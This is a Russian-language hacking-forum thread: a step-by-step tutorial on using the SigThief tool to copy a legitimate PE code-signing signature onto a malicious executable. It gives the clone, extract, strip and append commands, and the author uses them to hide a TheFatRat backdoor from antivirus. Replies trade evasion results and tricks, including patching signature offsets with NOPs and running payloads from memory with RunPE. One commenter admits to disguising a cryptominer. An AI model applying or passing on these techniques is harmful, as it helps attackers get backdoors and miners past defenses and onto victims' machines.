• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Статья Прячем свой грязный код от АнтиВирусов

ОбхАВ.png

(МЕГА-СУПЕР-КРУТО-ХАЦКЕРСКАЯ привъюшка :) )
Приветствие читателе форума, и просто гостей, которым мы рады :3
В этой статье я опишу способ использования инструмент под названием SigThief. Он разрывает подпись из файла PE, и добавляет его в другой, исправив таблицу сертификатов для подписания файла. Суть в том что эта подпись, будет пересоздана инструментом, не действительная(фальшивая), это и есть секрет скрытия файла от АВ.

Что такое, подпись PE, читай тут:


Приступим: качаем с гита, заходим в папку, и проверяем "все ли на месте":
Код:
git clone https://github.com/secretsquirrel/SigThief
cd SigThief
ls -l
Снимок экрана от 2017-09-29 20-21-56.png

Можно почитать, README, запускаем скрипт, и смотрим хелп:
Код:
python sigthief.py --help
Снимок экрана от 2017-09-29 20-24-47.png


1. Проверяем Есть ли водпись в .ехе файле(немножко пришлось повозиться чтоб найти файл с сигнатурой, с Фш выташила :) ):
Код:
python sigthief.py -i '/opt/SigThief/Ruiner.exe' -- нету подписей
python sigthief.py -i '/media/root/UUI/11/Приложения/AGF3DPrinterDriver.exe' -- есть подпись
Снимок экрана от 2017-09-29 22-44-47.png


Примечание: Можно все файлы копировать в папку и запускать напрямую(. /pruebas/+файл), и не вводить путь к файлу. Или перетаскивать файлы в консоль, как это делала я :)

2. Сохранения подписи:
Код:
python sigthief.py -i '[место_к_файлу]/[имя_файла].exe' -r
Снимок экрана от 2017-09-29 23-07-56.png


3. Использовать разорванную подпись:
Код:
python sigthief.py -s [место_к_файлу]/[имя_файла].exe_sig -t [файл_цель].exe
Снимок экрана от 2017-09-29 23-22-43.png


4.Удалять подпись:
Действительно интересные результаты, может помочь вам найти AVs, которые ценят подписи больше чем функциона кода
Код:
python sigthief.py -i [место_к_файлу]/[имя_файла].exe -T


5. Создания файла с чужой подписью:
Код:
python sigthief.py -i '/opt/SigThief/url_pe.exe' -t '/opt/SigThief/Ruiner.exe' -o /tmp/url_pe_virus.exe

Очень важно! Сохранять только в /tmp/

Использовала бекдор от TheFatRat, сначала до апгрейда и после ( , и )

Спасибо за внимание, услышемся.

 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
У Вас грязный код!? Тогды Мы идем к Вам!

Браво!) Впечатляет! ) чую в нашей уютной секте скоро появиться девушка)
 
Последнее редактирование:
I

IioS

Так как ссылки, на тесты перестали быть активны(может только для меня). Я решила залить скрин тестов, до, и после

скан.png
 
P

PenGenKiddy

Окей, но ведь должны что существует 3 типа анализа вирусов
P. S. Статья хорошая, просто хочу сказать то, что знаю
Сигнатурный - Который вы как видно обходите в данной статье
Проактивный - Обход только путем обфускации памяти или изменения алгоритмов
БрейнЧек (Называю это так я и ещё пару человек, настоящего названия не знаю, возможно просто WhiteList) - Ну это тупо белый список файлов, не обойти (Простым смертным уж точно ;3)

Раньше (года 2 назад) мы били файлы на несколько частей и чекали части в антивирусах, те которые палили записывали
И получалось найти OFFSET Hex`a сигнатуры который палится, а также его длину, дальше надо было просто немного изменить инструкции или добавить несколько NOP

Так-же можно наговнокодить RunPE на каких нибудь плюсах и бросать файл прямо в память

* Возможно где то мог наврать, чистили треш года 2 назад на IFud (Форум старичок), потом все стали взрослые и начали работать :)
 

ghost

Well-known member
12.05.2016
1 636
3 288
BIT
0
я сначала прочитал название "Прячем свой код от грязных антивирусов" )))
Спасибо за материал!
"от грязных антивирусов" :) меня действительно повеселили эти строки. Спасибо. Давно так не смеялся.
Но когда я действительно хочу посмеяться, то иду на Али
Снимок экрана от 2017-09-30 14-51-12.png

Там элитные товары "для еенщин и муечин". Забавно, не правда?
 
Последнее редактирование:
O

OneDollar

надеюсь, что этот способ проживет долгую и счастливую жизнь..)
 
  • Нравится
Реакции: nikos и Ondrik8

Breed

Заблокирован
16.05.2017
194
238
BIT
0
Статейка зачетная.
Снимаю шляпу :).
За свою практику встречаю вторую женщину с таким уровнем :)

надеюсь, что этот способ проживет долгую и счастливую жизнь
Эти б слова, да Богу в уши: SigThief опубликован всего месяц назад. Еще месячишко и результат будет виден.
 
  • Нравится
Реакции: Teo, Sphinx и OneDollar

Black Diver

Green Team
24.01.2017
36
62
BIT
0
symantec распознает подписанные пейлоады. Остальные антивирусы попробую проверить позднее.
 
  • Нравится
Реакции: id2746
M

MR.L

Годно как мне кажется, нужно попробовать вечером...
 

Elektrolife

Green Team
21.10.2016
208
33
BIT
14
А есть что то похожее для PDF DOC файлов ? Сколько не пробую - не могу получить FUD,популярные антивири всё равно палят
 
O

OneDollar

Лучше такую фичу под ведроид и было бы счастье)
 

woolf1514

Green Team
06.03.2017
181
191
BIT
1
Вот мой результат:

link removed link removed

Метод рабочий, но, возможно, я что-то не до конца понял... Благодуха!
 

Вложения

  • Снимок1.JPG
    Снимок1.JPG
    18 КБ · Просмотры: 403
  • Снимок.JPG
    Снимок.JPG
    18,7 КБ · Просмотры: 397
I

IioS

Вот мой результат:
Метод рабочий, но, возможно, я что-то не до конца понял... Благодуха!
Я сделала бекдор от FatRat, по причине что он не очень палевной, у меня получилось сделать его - невидимым. А что ты драл исходным материалом(то что очень палевной вижу :), но что это бекдор? червь? майнер? )?
 
O

OneDollar

Я сделала бекдор от FatRat, по причине что он не очень палевной, у меня получилось сделать его - невидимым. А что ты драл исходным материалом(то что очень палевной вижу :), но что это бекдор? червь? майнер? )?
Скорее всего РМС ник какой-то)
 

woolf1514

Green Team
06.03.2017
181
191
BIT
1
Я сделала бекдор от FatRat, по причине что он не очень палевной, у меня получилось сделать его - невидимым. А что ты драл исходным материалом(то что очень палевной вижу :), но что это бекдор? червь? майнер? )?

Это exe, который позволяет другой exe файл превратить в службу. И в этом другом exe файле зашит майнер)) Черт, никогда не задумывался, что, оказывается, схема построена слишком сложно.
 
  • Нравится
Реакции: OneDollar
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!